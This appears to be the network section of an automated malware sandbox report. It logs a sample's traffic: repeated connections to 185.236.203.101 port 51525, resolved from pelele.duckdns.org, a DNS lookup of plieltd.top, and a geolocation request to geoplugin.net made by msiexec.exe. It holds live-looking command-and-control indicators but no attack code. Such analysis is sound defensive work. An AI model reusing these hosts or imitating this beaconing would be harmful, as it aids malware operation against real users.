                                                                                                                                              Oct 21, 2024 08:35:00.714050055 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:00.714059114 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.019906998 CEST4974151525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:01.024728060 CEST5152549741185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.337831020 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.393450022 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:01.624464989 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:01.626427889 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:01.629498005 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.629512072 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.629523993 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.629532099 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.629590034 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.629594088 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.629653931 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.629663944 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.629673958 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.629687071 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.629720926 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.629770994 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.629781008 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.629789114 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.631210089 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.631272078 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.631282091 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.631336927 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.631345987 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.631396055 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.631405115 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.631424904 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:01.631433010 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:02.036674976 CEST4974151525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:02.041481018 CEST5152549741185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:02.354675055 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:02.408982038 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:03.221028090 CEST4974151525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:03.225819111 CEST5152549741185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.402751923 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:03.404133081 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:03.407685995 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.407692909 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.407704115 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.407710075 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.407715082 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.407725096 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.407735109 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.407838106 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.407877922 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.407888889 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.407907963 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.407917976 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.407927036 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.407939911 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.409064054 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.409074068 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.409081936 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.412499905 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.412518024 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.412528038 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.412566900 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.412599087 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.412617922 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.537523985 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.580868959 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:03.605160952 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:03.607084990 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:03.610109091 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610121965 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610137939 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610162973 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610172987 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610181093 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610189915 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610207081 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610332966 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610383987 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610394001 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610402107 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610419989 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610428095 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.612046003 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.612091064 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.612101078 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.612118006 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.612128019 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.612183094 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.612191916 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.612200022 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.612215996 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.316589117 CEST4974151525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:04.321500063 CEST5152549741185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.678992033 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.733601093 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:04.734920979 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:04.738564014 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.738574982 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.738616943 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.738626003 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.738660097 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.738668919 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.738719940 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.738729954 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.738769054 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.738780022 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743446112 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743458033 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743468046 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743520975 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743530989 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743539095 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743556976 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743566036 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743607044 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743616104 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743633032 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743659973 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743669987 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.465642929 CEST4974151525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:05.470498085 CEST5152549741185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.782790899 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.830874920 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:05.877307892 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:05.882142067 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882225990 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882236004 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882282019 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882289886 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882298946 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882307053 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882369995 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882409096 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882417917 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882426023 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882433891 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882448912 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882457018 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.887475967 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:05.892323971 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.892333984 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.892349958 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.892358065 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.892375946 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.892388105 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.892393112 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.892512083 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.892541885 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.892550945 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.579862118 CEST4974151525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:06.584750891 CEST5152549741185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.895575047 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.960113049 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:06.962191105 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:06.965020895 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965162992 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965173960 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965192080 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965200901 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965248108 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965257883 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965269089 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965280056 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965296984 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965306044 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965313911 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965421915 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965431929 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.967102051 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.967111111 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.969820976 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.969830990 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.969883919 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.969893932 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.969899893 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.969902992 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.969922066 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.583240032 CEST4974151525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:07.588054895 CEST5152549741185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.898623943 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.940257072 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:07.942502975 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:07.945214033 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.945225954 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.945235968 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.945245028 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.945278883 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.945286989 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.945333958 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.945343018 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.945362091 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.945370913 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.945380926 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.945389986 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.945406914 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.945415974 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.947436094 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.947444916 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.947460890 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.947470903 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.947479010 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.947494030 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.947503090 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.947566032 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:07.947573900 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.599033117 CEST4974151525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:08.603990078 CEST5152549741185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.917840958 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.971548080 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:08.985775948 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:08.988584042 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:08.990688086 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.990750074 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.990760088 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.990763903 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.990782976 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.990792036 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.990799904 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.990989923 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.990999937 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.991018057 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.991027117 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.991086006 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.991096020 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.991120100 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.993424892 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.993433952 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.993457079 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.993474960 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.993515968 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.993525982 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.993534088 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.993590117 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.993609905 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:08.993618965 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:09.217284918 CEST5152549738185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:09.268378019 CEST4973851525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:12.193455935 CEST4973851525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:12.193625927 CEST4974080192.168.2.4178.237.33.50
                                                                                                                                              Oct 21, 2024 08:35:12.193672895 CEST4974151525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:12.193707943 CEST4974251525192.168.2.4185.236.203.101

                                                                                                                                              UDP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Oct 21, 2024 08:34:01.051676989 CEST5323553192.168.2.41.1.1.1
                                                                                                                                              Oct 21, 2024 08:34:01.459981918 CEST53532351.1.1.1192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:41.966664076 CEST5757353192.168.2.41.1.1.1
                                                                                                                                              Oct 21, 2024 08:34:42.956191063 CEST5757353192.168.2.41.1.1.1
                                                                                                                                              Oct 21, 2024 08:34:43.988320112 CEST5757353192.168.2.41.1.1.1
                                                                                                                                              Oct 21, 2024 08:34:45.977020025 CEST53575731.1.1.1192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:45.977036953 CEST53575731.1.1.1192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:45.977046013 CEST53575731.1.1.1192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:46.990537882 CEST5468653192.168.2.41.1.1.1
                                                                                                                                              Oct 21, 2024 08:34:48.016974926 CEST5468653192.168.2.41.1.1.1
                                                                                                                                              Oct 21, 2024 08:34:48.122287035 CEST53546861.1.1.1192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:48.124614000 CEST53546861.1.1.1192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:50.105990887 CEST5490553192.168.2.41.1.1.1
                                                                                                                                              Oct 21, 2024 08:34:51.096694946 CEST5490553192.168.2.41.1.1.1
                                                                                                                                              Oct 21, 2024 08:34:51.138307095 CEST53549051.1.1.1192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:51.138350964 CEST53549051.1.1.1192.168.2.4

                                                                                                                                              DNS Queries

                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                              Oct 21, 2024 08:34:01.051676989 CEST192.168.2.41.1.1.10x26fdStandard query (0)plieltd.topA (IP address)IN (0x0001)false
                                                                                                                                              Oct 21, 2024 08:34:41.966664076 CEST192.168.2.41.1.1.10x19ecStandard query (0)pelele.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                              Oct 21, 2024 08:34:42.956191063 CEST192.168.2.41.1.1.10x19ecStandard query (0)pelele.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                              Oct 21, 2024 08:34:43.988320112 CEST192.168.2.41.1.1.10x19ecStandard query (0)pelele.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                              Oct 21, 2024 08:34:46.990537882 CEST192.168.2.41.1.1.10xea6Standard query (0)pelele.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                              Oct 21, 2024 08:34:48.016974926 CEST192.168.2.41.1.1.10xea6Standard query (0)pelele.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                              Oct 21, 2024 08:34:50.105990887 CEST192.168.2.41.1.1.10x847fStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                              Oct 21, 2024 08:34:51.096694946 CEST192.168.2.41.1.1.10x847fStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                                              DNS Answers

                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                              Oct 21, 2024 08:34:01.459981918 CEST1.1.1.1192.168.2.40x26fdNo error (0)plieltd.top172.67.155.139A (IP address)IN (0x0001)false
                                                                                                                                              Oct 21, 2024 08:34:01.459981918 CEST1.1.1.1192.168.2.40x26fdNo error (0)plieltd.top104.21.56.189A (IP address)IN (0x0001)false
                                                                                                                                              Oct 21, 2024 08:34:45.977020025 CEST1.1.1.1192.168.2.40x19ecServer failure (2)pelele.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Oct 21, 2024 08:34:45.977036953 CEST1.1.1.1192.168.2.40x19ecServer failure (2)pelele.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Oct 21, 2024 08:34:45.977046013 CEST1.1.1.1192.168.2.40x19ecServer failure (2)pelele.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Oct 21, 2024 08:34:48.122287035 CEST1.1.1.1192.168.2.40xea6No error (0)pelele.duckdns.org185.236.203.101A (IP address)IN (0x0001)false
                                                                                                                                              Oct 21, 2024 08:34:48.124614000 CEST1.1.1.1192.168.2.40xea6No error (0)pelele.duckdns.org185.236.203.101A (IP address)IN (0x0001)false
                                                                                                                                              Oct 21, 2024 08:34:51.138307095 CEST1.1.1.1192.168.2.40x847fNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                              Oct 21, 2024 08:34:51.138350964 CEST1.1.1.1192.168.2.40x847fNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                              • plieltd.top
                                                                                                                                              • geoplugin.net

                                                                                                                                              HTTP Packets

                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              0192.168.2.449740178.237.33.50807104C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 21, 2024 08:34:51.145139933 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                              Host: geoplugin.net
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Oct 21, 2024 08:34:51.998903990 CEST1164INHTTP/1.1 200 OK
                                                                                                                                              date: Mon, 21 Oct 2024 06:34:51 GMT
                                                                                                                                              server: Apache
                                                                                                                                              content-length: 956
                                                                                                                                              content-type: application/json; charset=utf-8
